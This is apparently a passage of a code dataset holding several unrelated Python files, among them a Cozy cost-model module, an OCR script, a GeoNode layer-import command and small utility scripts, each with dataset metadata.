< v2 else \"->\", pprint(c1), pprint(c2)))\n le = cardinality_le(c1, c2, assumptions=assumptions, solver=solver)\n if le:\n res.append(EBinOp(v1, \"<=\", v2).with_type(BOOL))\n\n if incremental and use_indicators:\n solver.add_assumption(EAll(\n [EEq(indicator, f) for (v1, v2, indicator, f) in conds]))\n for (v1, v2, indicator, f) in conds:\n if solver.valid(indicator):\n res.append(EBinOp(v1, \"<=\", v2).with_type(BOOL))\n\n if incremental:\n solver.pop()\n\n if assume_large_cardinalities.value:\n min_cardinality = ENum(assume_large_cardinalities.value).with_type(INT)\n for cvar, exp in cardinalities.items():\n if isinstance(exp, EVar):\n res.append(EBinOp(cvar, \">\", min_cardinality).with_type(BOOL))\n\n # print(\"cards: {}\".format(pprint(EAll(res))))\n return EAll(res)\n @typechecked\n def always(self, op, other, cards : Exp, **kwargs) -> bool:\n \"\"\"\n Partial order on costs.\n \"\"\"\n if isinstance(self.formula, ENum) and isinstance(other.formula, ENum):\n return eval(EBinOp(self.formula, op, other.formula).with_type(BOOL), env={})\n f = EImplies(cards, EBinOp(self.formula, op, other.formula).with_type(BOOL))\n if integer_cardinalities.value:\n try:\n return valid(f, logic=\"QF_LIA\", timeout=1, **kwargs)\n except SolverReportedUnknown:\n # If we accidentally made an unsolveable integer arithmetic formula,\n # then try again with real numbers. This will admit some models that\n # are not possible (since bags must have integer cardinalities), but\n # returning false is always a safe move here, so it's fine.\n print(\"Warning: not able to solve {}\".format(pprint(f)))\n f = subst(f, { v.id : EVar(v.id).with_type(REAL) for v in free_vars(cards) })\n # This timeout is dangerous! Sufficiently complex specifications\n # will cause this to timeout _every_time_, meaning we never make\n # progress.\n # However, this timeout helps ensure liveness: the Python process\n # never gets deadlocked waiting for Z3. In the Distant Future it\n # would be nice to move away from Z3Py and invoke Z3 as a subprocess\n # instead. 
That would allow the Python process to break out if it is\n # asked to stop while Z3 is running. It would also give us added\n # protection against Z3 segfaults, which have been observed in the\n # wild from time to time.\n timeout = 60\n try:\n return valid(f, logic=\"QF_NRA\", timeout=timeout, **kwargs)\n except SolverReportedUnknown:\n print(\"Giving up!\")\n return False\n\nclass PlainCost(Cost):\n def __init__(self, n : int):\n self.n = n\n def __repr__(self):\n return \"PlainCost({!r})\".format(self.n)\n def __str__(self):\n return str(self.n)\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n assert isinstance(other, PlainCost)\n if self.n < other.n:\n return Cost.BETTER\n elif self.n > other.n:\n return Cost.WORSE\n else:\n return Cost.UNORDERED\n\nfrom contextlib import contextmanager\nimport datetime\nimport sys\n@contextmanager\ndef timed(name=\"anon\"):\n # print(\"--tick [{}]... \".format(name), end=\"\")\n sys.stdout.flush()\n st = datetime.datetime.now()\n yield\n duration = datetime.datetime.now() - st\n # print(\"tock [{}s]\".format(duration.total_seconds()))\n\nclass CompositeCost(Cost):\n def __init__(self, *costs):\n self.costs = tuple(costs)\n def __repr__(self):\n return \"CompositeCost({})\".format(\", \".join(repr(c) for c in self.costs))\n def __str__(self):\n return \"; \".join(str(c) for c in self.costs)\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n assert isinstance(other, CompositeCost)\n assert len(self.costs) == len(other.costs)\n i = 0\n for c1, c2 in zip(self.costs, other.costs):\n with timed(type(c1).__name__ + \"[{}]\".format(i)):\n order = c1.compare_to(c2, assumptions, solver)\n i += 1\n if order != Cost.UNORDERED:\n return order\n return Cost.UNORDERED\n\n# -----------------------------------------------------------------------------\n\nclass CompositeCostModel(CostModel):\n def __repr__(self):\n return \"CompositeCostModel()\"\n def is_monotonic(self):\n return False\n def cost(self, e, pool):\n cards = OrderedDict()\n # for v in free_vars(e):\n # if is_collection(v.type):\n # cardinality(v, cards)\n if pool == STATE_POOL:\n return CompositeCost(\n sizeof(e, cards),\n ast_size(e))\n else:\n assert pool == RUNTIME_POOL\n return CompositeCost(\n asymptotic_runtime(e),\n storage_size(e, cards),\n precise_runtime(e),\n ast_size(e))\n\ndef maybe_inline(e, f):\n if isinstance(e, ENum) or isinstance(e, EVar):\n return f(e)\n v = fresh_var(e.type, omit=free_vars(f(T)))\n body = f(v)\n return ELet(e, ELambda(v, body)).with_type(body.type)\n\ndef EMax(es):\n es = make_random_access(es)\n assert es\n assert all(isinstance(e, Exp) for e in es), es\n res = es[0]\n t = res.type\n fvs = set(v.id for v in free_vars(res))\n for i in range(1, len(es)):\n res = maybe_inline(res, lambda v1:\n maybe_inline(es[i], lambda v2:\n ECond(EGt(v1, v2), v1, v2).with_type(t)))\n # v1 = fresh_var(res.type, omit=fvs)\n # fvs.add(v1.id)\n # v2 = fresh_var(res.type, omit=fvs)\n # fvs.add(v2.id)\n # fvs |= set(v.id for v in free_vars(es[i]))\n # res = ELet(res, ELambda(v1,\n # ELet(es[i], ELambda(v2,\n # ECond(EGt(v1, v2), v1, v2).with_type(res.type))).with_type(res.type))).with_type(res.type)\n # res = ECond(EGt(res, es[i]), res, es[i]).with_type(res.type)\n return res\n\ndef asymptotic_runtime(e):\n class V(BottomUpExplorer):\n def __init__(self):\n super().__init__()\n self.cardinalities = { }\n def EBinOp(self, e1, op, e2):\n if isinstance(e1, list): e1 = EMax([ONE] + e1)\n if isinstance(e2, list): 
e2 = EMax([ONE] + e2)\n if op == \"*\":\n if e1 == ENum(1): return e2\n if e2 == ENum(1): return e1\n e = EBinOp(e1, op, e2).with_type(e1.type)\n if isinstance(e1, ENum) and isinstance(e2, ENum):\n return ENum(eval(e, {})).with_type(e1.type)\n return e\n def cardinality(self, e : Exp, **kwargs) -> Exp:\n return cardinality(e, self.cardinalities, **kwargs)\n def combine(self, costs):\n res = []\n q = list(costs)\n while q:\n c = q.pop()\n if isinstance(c, ENum):\n continue\n elif isinstance(c, Exp):\n res.append(c)\n else:\n assert isinstance(c, list) or isinstance(c, tuple), repr(c)\n q.extend(c)\n return res\n # return EMax([ONE] + res)\n def visit_EStateVar(self, e):\n return self.combine([ONE])\n def visit_EUnaryOp(self, e):\n costs = [ONE, self.visit(e.e)]\n if e.op in (UOp.Sum, UOp.Distinct, UOp.AreUnique, UOp.All, UOp.Any, UOp.Length):\n costs.append(self.cardinality(e.e))\n return self.combine(costs)\n def visit_EBinOp(self, e):\n c1 = self.visit(e.e1)\n c2 = self.visit(e.e2)\n costs = [ONE, c1, c2]\n if e.op == BOp.In:\n costs.append(self.cardinality(e.e2))\n elif e.op == \"==\" and is_collection(e.e1.type):\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n elif e.op == \"-\" and is_collection(e.type):\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n return self.combine(costs)\n def visit_ELambda(self, e):\n # avoid name collisions with fresh_var\n return self.visit(e.apply_to(fresh_var(e.arg.type)))\n def visit_EMakeMap2(self, e):\n return self.combine([self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.value)).with_type(INT)])\n def visit_EFilter(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.p)).with_type(INT)))\n def visit_EFlatMap(self, e):\n return self.visit(EMap(e.e, e.f))\n def visit_EMap(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMin(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMax(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EDropFront(self, e):\n return self.combine((ONE, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def visit_EDropBack(self, e):\n return self.combine((ONE, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def join(self, x, child_costs):\n if isinstance(x, list) or isinstance(x, tuple):\n return self.combine(child_costs)\n if not isinstance(x, Exp):\n return self.combine([ZERO])\n return self.combine(itertools.chain((ONE,), child_costs))\n vis = V()\n f = EMax([ONE] + vis.visit(e))\n # f = cse(f)\n return SymbolicCost(f, vis.cardinalities)\n\ndef sizeof(e, cardinalities):\n terms = [ONE]\n if is_collection(e.type):\n terms.append(cardinality(e, cardinalities))\n elif isinstance(e.type, TMap):\n ks = EMapKeys(e).with_type(TBag(e.type.k))\n terms.append(cardinality(ks, cardinalities))\n if is_collection(e.type.v):\n vals = EFlatMap(ks, mk_lambda(e.type.k, lambda k: EMapGet(e, k).with_type(e.type.v))).with_type(e.type.v)\n terms.append(cardinality(vals, cardinalities))\n return SymbolicCost(ESum(terms), cardinalities)\n\ndef storage_size(e, cardinalities):\n sizes = []\n for x in all_exps(e):\n if 
isinstance(x, EStateVar):\n sz_cost = sizeof(x.e, cardinalities)\n sizes.append(sz_cost.formula)\n return SymbolicCost(ESum(sizes), cardinalities)\n\n# Some kinds of expressions have a massive penalty associated with them if they\n# appear at runtime.\nEXTREME_COST = ENum(1000).with_type(INT)\nMILD_PENALTY = ENum( 10).with_type(INT)\nTWO = ENum( 2).with_type(INT)\n\ndef precise_runtime(e):\n class V(BottomUpExplorer):\n def __init__(self):\n super().__init__()\n self.cardinalities = { }\n def cardinality(self, e : Exp, **kwargs) -> Exp:\n return cardinality(e, self.cardinalities, **kwargs)\n def visit_EStateVar(self, e):\n return ONE\n def visit_EUnaryOp(self, e):\n costs = [ONE, self.visit(e.e)]\n if e.op in (UOp.Sum, UOp.Distinct, UOp.AreUnique, UOp.All, UOp.Any, UOp.Length):\n costs.append(self.cardinality(e.e))\n return ESum(costs)\n def visit_EBinOp(self, e):\n c1 = self.visit(e.e1)\n c2 = self.visit(e.e2)\n costs = [ONE, c1, c2]\n if e.op == BOp.In:\n costs.append(self.cardinality(e.e2))\n elif e.op == \"==\" and is_collection(e.e1.type):\n costs.append(EXTREME_COST)\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n elif e.op == \"-\" and is_collection(e.type):\n costs.append(EXTREME_COST)\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n return ESum(costs)\n def visit_ELambda(self, e):\n # avoid name collisions with fresh_var\n return self.visit(e.apply_to(fresh_var(e.arg.type)))\n def visit_EMapGet(self, e):\n # mild penalty here because we want \"x.f\" < \"map.get(x)\"\n return ESum((MILD_PENALTY, self.visit(e.map), self.visit(e.key)))\n def visit_EMakeMap2(self, e):\n return ESum((EXTREME_COST, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.value)).with_type(INT)))\n def visit_EFilter(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.p)).with_type(INT)))\n def visit_EFlatMap(self, e):\n return self.visit(EMap(e.e, e.f))\n def visit_EMap(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMin(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMax(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EDropFront(self, e):\n return ESum((MILD_PENALTY, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def visit_EDropBack(self, e):\n return ESum((MILD_PENALTY, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def join(self, x, child_costs):\n if isinstance(x, list) or isinstance(x, tuple):\n return ESum(child_costs)\n if not isinstance(x, Exp):\n return ZERO\n return ESum(itertools.chain((ONE,), child_costs))\n vis = V()\n f = vis.visit(e)\n return SymbolicCost(f, vis.cardinalities)\n\ndef ast_size(e):\n return PlainCost(e.size())\n\n# -----------------------------------------------------------------------------\n\n# @typechecked\ndef cardinality(e : Exp, cache : { Exp : EVar }, plus_one=False) -> Exp:\n assert is_collection(e.type)\n # if plus_one:\n # return ESum((self.cardinality(e, plus_one=False), ONE))\n if isinstance(e, EEmptyList):\n return ZERO\n if isinstance(e, ESingleton):\n return ONE\n if isinstance(e, EBinOp) and e.op == \"+\":\n return ESum((cardinality(e.e1, cache), cardinality(e.e2, 
cache)))\n if isinstance(e, EMap):\n return cardinality(e.e, cache)\n if isinstance(e, EStateVar):\n return cardinality(e.e, cache)\n prev = cache.get(e)\n if prev is not None:\n return prev\n else:\n v = fresh_var(INT)\n cache[e] = v\n # if isinstance(e, EFilter):\n # cc = self.cardinality(e.e)\n # self.assumptions.append(EBinOp(v, \"<=\", cc).with_type(BOOL))\n # # heuristic: (xs) large implies (filter_p xs) large\n # self.assumptions.append(EBinOp(\n # EBinOp(v, \"*\", ENum(5).with_type(INT)).with_type(INT), \">=\",\n # EBinOp(cc, \"*\", ENum(4).with_type(INT)).with_type(INT)).with_type(BOOL))\n # if isinstance(e, EUnaryOp) and e.op == UOp.Distinct:\n # cc = self.cardinality(e.e)\n # self.assumptions.append(EBinOp(v, \"<=\", cc).with_type(BOOL))\n # # self.assumptions.append(EImplies(EGt(cc, ZERO), EGt(v, ZERO)))\n # # heuristic: (xs) large implies (distinct xs) large\n # self.assumptions.append(EBinOp(\n # EBinOp(v, \"*\", ENum(5).with_type(INT)).with_type(INT), \">=\",\n # EBinOp(cc, \"*\", ENum(4).with_type(INT)).with_type(INT)).with_type(BOOL))\n # if isinstance(e, EBinOp) and e.op == \"-\":\n # self.assumptions.append(EBinOp(v, \"<=\", self.cardinality(e.e1)).with_type(BOOL))\n # if isinstance(e, ECond):\n # self.assumptions.append(EAny([EEq(v, self.cardinality(e.then_branch)), EEq(v, self.cardinality(e.else_branch))]))\n return v\n\n@lru_cache(maxsize=2**16)\n# @typechecked\ndef cardinality_le(c1 : Exp, c2 : Exp, assumptions : Exp = T, as_f : bool = False, solver : IncrementalSolver = None) -> bool:\n \"\"\"\n Is |c1| <= |c2|?\n Yes, iff there are no v such that v occurs more times in c2 than in c1.\n \"\"\"\n if True:\n f = EBinOp(ELen(c1), \"<=\", ELen(c2)).with_type(BOOL)\n else:\n assert c1.type == c2.type\n # Oh heck.\n # This isn't actually very smart if:\n # x = [y]\n # a = Filter (!= y) b\n # This method can't prove that |x| <= |a|, even though |a| is likely huge\n v = fresh_var(c1.type.t)\n f = EBinOp(ECountIn(v, c1), \"<=\", ECountIn(v, c2)).with_type(BOOL)\n if as_f:\n return f\n res = solver.valid(EImplies(assumptions, f)) if solver else valid(EImplies(assumptions, f))\n # assert res == valid(EImplies(assumptions, f))\n return res\n\ndef debug_comparison(e1, c1, e2, c2, assumptions : Exp = T):\n print(\"-\" * 20)\n print(\"comparing costs...\")\n print(\" e1 = {}\".format(pprint(e1)))\n print(\" c1 = {}\".format(c1))\n print(\" e2 = {}\".format(pprint(e2)))\n print(\" c2 = {}\".format(c2))\n print(\" c1 compare_to c2 = {}\".format(c1.compare_to(c2, assumptions=assumptions)))\n print(\" c2 compare_to c1 = {}\".format(c2.compare_to(c1, assumptions=assumptions)))\n for c1, c2 in zip(c1.costs, c2.costs):\n if not isinstance(c1, SymbolicCost):\n continue\n print(\"-\" * 10)\n print(\"comparing {} and {}\".format(c1, c2))\n print(\" c1 compare_to c2 = {}\".format(c1.compare_to(c2, assumptions=assumptions)))\n print(\" c2 compare_to c1 = {}\".format(c2.compare_to(c1, assumptions=assumptions)))\n print(\"variable meanings...\")\n for e, v in itertools.chain(c1.cardinalities.items(), c2.cardinalities.items()):\n print(\" {v} = len {e}\".format(v=pprint(v), e=pprint(e)))\n print(\"joint orderings...\")\n cards = c1.order_cardinalities(c2, assumptions=assumptions)\n print(\" {}\".format(pprint(cards)))\n for op in (\"<=\", \"<\", \">\", \">=\"):\n print(\"c1 always {} c2?\".format(op))\n x = []\n res = c1.always(op, c2, cards=cards, model_callback=lambda m: x.append(m))\n if res:\n print(\" YES\")\n elif not x:\n print(\" NO (no model!?)\")\n else:\n print(\" NO: 
{}\".format(x[0]))\n print(\" c1 = {}\".format(eval(c1.formula, env=x[0])))\n print(\" c2 = {}\".format(eval(c2.formula, env=x[0])))\n\ndef break_sum(e):\n if isinstance(e, EBinOp) and e.op == \"+\":\n yield from break_sum(e.e1)\n yield from break_sum(e.e2)\n else:\n yield e\n\ndef ESum(es):\n es = [e for x in es for e in break_sum(x) if e != ZERO]\n if not es:\n return ZERO\n nums, nonnums = partition(es, lambda e: isinstance(e, ENum))\n es = nonnums\n if nums:\n es.append(ENum(sum(n.val for n in nums)).with_type(INT))\n return build_balanced_tree(INT, \"+\", es)\n","sub_path":"cozy/cost_model.py","file_name":"cost_model.py","file_ext":"py","file_size_in_byte":23461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"93108160","text":"import cv2\nimport numpy as np\nimport pytesseract\nfrom PIL import Image\n\n\ndef hangulFilePathImageRead(filePath):\n stream = open(filePath.encode(\"utf-8\"), \"rb\")\n bytes = bytearray(stream.read())\n numpyArray = np.asarray(bytes, dtype=np.uint8)\n\n return cv2.imdecode(numpyArray, cv2.IMREAD_UNCHANGED)\n\n# filepath = '공부하기싫다.jpg'\n# filepath = hangulFilePathImageRead(filepath)\n\n# filepath = cv2.cvtColor(filepath,cv2.COLOR_BGR2GRAY)\n# ret, file_result = cv2.threshold(filepath,127,255,cv2.THRESH_BINARY)\n\n# cv2.imshow('imageshow',filepath)\n# cv2.imshow('imageshow',file_result)\n# cv2.waitKey(0) # 이미지가 show 된 상태로 wait\n# cv2.destroyAllWindows()\nimg = cv2.imread('toon3.jpg',cv2.THRESH_BINARY)\ncv2.imshow('img',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n# img = Image.open('test.png')\n# re_img = img.resize((1024,1024))\n# re_img.save('toon2.jpg')\n# re_img\npytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'\n\nprint(pytesseract.image_to_string(img,lang='kor'))\n\n","sub_path":"image/text/text_out.py","file_name":"text_out.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"388686597","text":"# -*- coding: utf8 -*-\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom optparse import OptionParser\nfrom optparse import make_option\nfrom geoserver.catalog import Catalog\nfrom uuid import uuid4\nfrom decimal import *\nfrom django.core.management import call_command\nimport time\nimport psycopg2\n\nfrom geonode.layers.models import Layer\n\nclass Command(BaseCommand):\n\n args = 'params'\n help = 'Collect layer from Database'\n geoserver_url = settings.OGC_SERVER['default']['LOCATION']\n geoserver_rest_url = geoserver_url + 'rest'\n urb = {\n \"capa\":\"Parcelles\",\n \"toli\":\"cadastre_ln_toponymiques\",\n \"canu\":\"cadastre_pt_num\",\n \"cabu\":\"Batiments\",\n \"gept\":\"cadastre_points_generaux\",\n \"gepn\":\"cadastre_pol_gen\",\n \"inpt\":\"point\",\n \"geli\":\"cadastre_ln_generales\",\n \"inli\":\"cadastre_ln_informations\",\n \"topt\":\"point\",\n }\n\n option_list = BaseCommand.option_list + (\n make_option(\"-c\", \"--geoserveradmin\",\n action='store',\n type=\"string\",\n dest='geoserveradmin',\n default=\"admin\",\n help=\"Nom utilisateur Geoserver = [default: %default]\"),\n )+ (\n make_option(\"-p\", \"--gpw\",\n action='store',\n type=\"string\",\n dest='gpw',\n default=\"\",\n help=\"Geoserver password [default: %default]\"),\n )+ (\n make_option(\"-u\", \"--dbadr\",\n action='store',\n type=\"string\",\n dest='dbadr',\n default=\"\",\n help=\"Adresse base de données [default: 
%default]\"),\n )+ (\n make_option(\"-m\", \"--dbport\",\n action='store',\n type=\"string\",\n dest='dbport',\n default=\"5432\",\n help=\"Port base de données = [default: %default]\"),\n )+ (\n make_option(\"-g\", \"--postuser\",\n action='store',\n type=\"string\",\n dest='postuser',\n default=\"ro_user\",\n help=\"Utilisateur base de données = [default: %default]\"),\n )+ (\n make_option(\"-r\", \"--ropw\",\n action='store',\n type=\"string\",\n dest='ropw',\n default=\"\",\n help=\"Password base de données [default: %default]\"),\n )+ (\n make_option(\"-d\", \"--database\",\n action='store',\n type=\"string\",\n dest='database',\n default=\"urbangis\",\n help=\"Nom base de données = [default: %default]\"),\n )+ (\n make_option(\"-a\", \"--alias\",\n action='store',\n type=\"string\",\n dest='alias',\n default=\"\",\n help=\"Workspace [default: %default]\"),\n )+ (\n make_option(\"-z\", \"--uri\",\n action='store',\n type=\"string\",\n dest='uri',\n default=\"imio.be\",\n help=\"Uri espace de nommage = [default: %default]\"),\n )+ (\n make_option(\"-n\", \"--groupname\",\n action='store',\n type=\"string\",\n dest='groupname',\n default=\"\",\n help=\"Groupe qui pourra voir les couches [default: %default]\"),\n )\n\n def createDataStore(self, options):\n try:\n cat = Catalog(self.geoserver_rest_url, options['geoserveradmin'], options['gpw'])\n #create datastore for URB schema\n ws = cat.create_workspace(options['alias'],options['uri'])\n\n try:\n ds = cat.create_datastore(options['alias'], ws)\n ds.connection_parameters.update(\n host=options['dbadr'],\n port=options['dbport'],\n database=options['database'],\n user=options['postuser'],\n passwd=options['ropw'],\n dbtype=\"postgis\")\n cat.save(ds)\n except Exception as e:\n print(str(e))\n raise Exception('Erreur de connexion au Geoserver lors de la création du DataStore')\n except Exception as e:\n raise Exception(str(e))\n return ws.name , ds.name, ds.resource_type\n\n def addLayersToGeoserver(self, options):\n cat = Catalog(self.geoserver_rest_url, options['geoserveradmin'], options['gpw'])\n\n try:\n ds = cat.get_store(options['alias'])\n except Exception as e:\n raise Exception('Erreur de récupération du workspace')\n\n layers = []\n try:\n #connect to tables and create layers and correct urban styles\n for table in self.urb:\n try:\n style = self.urb[table]\n ft = cat.publish_featuretype(table, ds, 'EPSG:31370', srs='EPSG:31370')\n gs_style = cat.get_style(style)\n cat.save(ft)\n res_name = ft.dirty['name']\n res_title = options['alias']+\"_\"+table\n cat.save(ft)\n layer_name = ds.workspace.name + ':' + res_name\n new_layer = cat.get_layer(layer_name)\n new_layer.default_style = gs_style\n cat.save(new_layer)\n layers.append({ 'res_name' : res_name, 'res_title' : res_title })\n except Exception as e:\n # a verifier une fois un possesion des styles\n print(str(e))\n\n except Exception as e:\n print(str(e))\n raise Exception('Erreur lors de la récupération des couches depuis Geoserver')\n\n return layers\n\n def addLayersToGeonode(self, options, ws_name, ds_name, ds_resource_type, layers):\n try:\n for l in layers:\n created = False\n print(\"Add layer %s in geonode\" % (ws_name + ':' + l['res_name']))\n layer, created = Layer.objects.get_or_create(typename=ws_name + ':' + l['res_name'], defaults={\n \"name\" : l['res_name'],\n \"workspace\": ws_name,\n \"store\": ds_name,\n \"storeType\": ds_resource_type,\n \"typename\": \"%s:%s\" % (ws_name.encode('utf-8'), l['res_name'].encode('utf-8')),\n \"title\": l['res_title'] or 'No 
title provided',\n \"abstract\": 'No abstract provided',\n #\"owner\": owner,\n \"uuid\": str(uuid4())\n #\"bbox_x0\": Decimal(ft.latLonBoundingBox.miny),\n #\"bbox_x1\": Decimal(ft.latLonBoundingBox.maxy),\n #\"bbox_y0\": Decimal(ft.latLonBoundingBox.minx),\n #\"bbox_y1\": Decimal(ft.latLonBoundingBox.maxx)\n })\n\n if created:\n grName = unicode(options['groupname'])\n print(\"Couche ok, ajout de la couche au groupe %s\" % (grName))\n perm = {\n u'users': {\n u'AnonymousUser': [u'view_resourcebase'] },\n u'groups': {\n grName:[u'view_resourcebase',u'download_resourcebase'] }\n }\n try:\n layer.set_permissions(perm)\n layer.save()\n except Exception as e:\n print(str(e))\n raise Exception('Problème survenu lors de l\\'application des permissions aux couches')\n else:\n raise Exception('Erreur lors de l\\'importation. Le layer'+ws_name + ':' + l['res_name']+'existe déjà')\n\n except Exception as e:\n print(\"Erreur ***\")\n print(str(e))\n raise Exception('Erreur lors de l\\'importation des couches depuis Geoserver',e)\n\n def handle(self, *args, **options):\n if self.verifParams(options):\n try:\n conn = psycopg2.connect(\"dbname='\" + options['database'] + \"' user='\" + options['postuser'] + \"' host='\" + options['dbadr'] + \"' password='\" + options['ropw'] + \"' port='\" + options['dbport'] + \"'\")\n conn.close()\n except psycopg2.Error as e:\n if 'could not connect to server: Connection refused' in e.message:\n raise Exception('La connexion au serveur n\\'est pas valide. Vérifier l\\'adresse et le port')\n if 'FATAL: database ' in e.message:\n raise Exception('La nom de la basse de données n\\'est pas correcte')\n if 'FATAL: password authentication failed ' in e.message:\n raise Exception('Erreur de login/password')\n if 'could not translate host name' in e.message:\n raise Exception('Erreur sur l\\'adresse de la base de données')\n raise Exception('Erreur de connection à la base de données')\n\n ws_name , ds_name, ds_resource_type = self.createDataStore(options)\n layers = self.addLayersToGeoserver(options)\n self.addLayersToGeonode(options,ws_name, ds_name,ds_resource_type, layers)\n\n else:\n raise Exception('Des paramètres non pas été définit')\n\n def verifParams(self, options):\n if(options['gpw'] is None or options['gpw'] is '' or\n options['dbadr'] is None or options['dbadr'] is '' or\n options['ropw'] is None or options['ropw'] is '' or\n options['alias'] is None or options['alias'] is '' or\n options['groupname'] is None or options['groupname'] is ''):\n print('Some parameter was not define')\n return False\n else:\n return True\n","sub_path":"adminimio/management/commands/addurb.py","file_name":"addurb.py","file_ext":"py","file_size_in_byte":9554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"604042596","text":"\"\"\"\n map_procedure - Creates a map by a certain algorithm\n using a seed number of nodes to traverse.\n\n Contains just one method that will return a 2d list map.\n @author Dylan McLarty\n\"\"\"\n\nimport random\nimport math\nfrom collections import deque\nimport TreasureAlgorithms\n\nmap_proc = []\n\n\ndef map_procedure(size, num_nodes):\n global map_proc\n start_pos = [math.floor(size / 2), math.floor(size / 2)]\n for x in range(size):\n map_proc.append(['#' for y in range(size)])\n\n def snake_proc(init_pos, node_list):\n global map_proc\n if len(node_list) > 0:\n node = node_list.popleft()\n x = abs(node[0] - init_pos[0])\n y = abs(node[0] - init_pos[0])\n if random.randint(1, 9) > 5:\n if 0 < x < 
10:\n map_proc[init_pos[0]][init_pos[1]] = str(x)\n init_pos[0] = init_pos[0] + x\n else:\n # Move incremental x, then move y,\n xd = random.randint(1, 9)\n map_proc[init_pos[0]][init_pos[1]] = str(xd)\n init_pos[0] = init_pos[0] + xd\n if 0 < y < 10:\n map_proc[init_pos[0]][init_pos[1]] = str(y)\n init_pos[0] = init_pos[0] + y\n else:\n # Move incremental y, then check if we made it.\n yd = random.randint(1, 9)\n map_proc[init_pos[0]][init_pos[1]] = str(yd)\n init_pos[0] = init_pos[0] + yd\n if node != init_pos:\n node_list.appendleft(node)\n else:\n # Try again\n snake_proc(init_pos, node_list)\n else:\n return\n\n # Generate list of tuples to traverse\n traversals = [[random.randint(1, size - 1), random.randint(1, size - 1)] for x in range(num_nodes)]\n for tuples in traversals:\n print(str(tuples))\n # Find and sort Tuples into traversal order.\n\n # Add nearest goal state to finish solution.\n node_deque = deque(traversals)\n last_node = node_deque.pop()\n if last_node[0] > start_pos[0]:\n if last_node[1] > start_pos[1]:\n node_deque.append([0, 0])\n else:\n node_deque.append([0, size - 1])\n else:\n if last_node[1] > start_pos[1]:\n node_deque.append([size - 1, 0])\n else:\n node_deque.append([size - 1, size - 1])\n # Run snake to leave solution moves.\n snake_proc(start_pos, node_deque)\n # Fill the rest of the array with(hopefully) junk values.\n for i in map_proc:\n for j in range(size):\n if i[j] == '#':\n i[j] = str(random.randint(1, 9))\n\n return map_proc\n\n\nmap_test = map_procedure(21, 7)\nfor x in map_test:\n print(' '.join(x))\n\nprint(TreasureAlgorithms.backtrack())","sub_path":"ProcedureMap.py","file_name":"ProcedureMap.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"85565559","text":"from signaturefunctions import *\n\n\ndef signature_by_stem_data(Lexicon):\n SignatureStemList = dict()\n SigDataDict = dict()\n for sig_string in Lexicon.SignatureStringsToStems:\n sig_list = MakeSignatureListFromSignatureString(sig_string)\n SignatureStemList[sig_string] = list()\n for stem in Lexicon.SignatureStringsToStems[sig_string]:\n SignatureStemList[sig_string].append(stem)\n\n SigDataDict[sig_string] = dict()\n for affix in sig_list:\n SigDataDict[sig_string][affix] = list()\n for stem in SignatureStemList[sig_string]:\n word = stem + affix\n SigDataDict[sig_string][affix].append(Lexicon.WordCounts[word])\n return (SignatureStemList, SigDataDict)\n","sub_path":"dataviz.py","file_name":"dataviz.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"71697928","text":"##############################################\r\n# #\r\n# Поиск неуникальных элементов в массиве #\r\n# #\r\n##############################################\r\n\r\ncheckio=[]\r\nprint(\"Введите элементы массива: \")\r\nfor n in range(1000):\r\n a=input(\"\")\r\n if a==\"0\":\r\n break\r\n else:\r\n checkio.append(a)\r\n \r\n#checkio=[1, 2, 3, 1, 3, 5, 3, 6, 7, 5]\r\nprint(\"Дан массив: \", checkio)\r\nlst=list(checkio)\r\nres=[]\r\nfor n in lst:\r\n a=lst.count(n)\r\n if a!=1:\r\n res.append(n)\r\nprint(\"Массив неуникальных элементов: \", res)\r\n","sub_path":"non-unique elements.py","file_name":"non-unique elements.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"612531953","text":"#!/usr/bin/env 